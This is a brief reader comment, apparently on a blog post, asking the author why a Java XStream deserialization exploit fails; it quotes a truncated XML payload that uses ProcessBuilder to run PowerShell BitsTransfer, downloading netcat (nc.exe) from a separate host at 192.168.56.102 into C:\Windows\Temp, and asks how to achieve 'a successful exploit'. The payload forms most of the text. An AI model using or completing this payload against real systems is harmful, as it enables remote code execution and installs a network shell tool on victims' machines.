AliBawazeEer
1 min read · Sep 25, 2017


Hi Riyaz, trying to replicate the same, however it's not working.

Below is part of the exploit trying to download ncat as suggested … may I know why it's not working? Whenever I launch powershell alone, the process starts .. is it related to encoding and some kind of escaping, and what can be done for a successful exploit?

<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>powershell ipmo BitsTransfer;Start-BitsTransfer -Source http://192.168.56.102:8000/nc.exe -Destination C:\Windows\Temp\</string>
</command>
</next>
</iter>
<filter class="javax.imageio.ImageIO$Cont
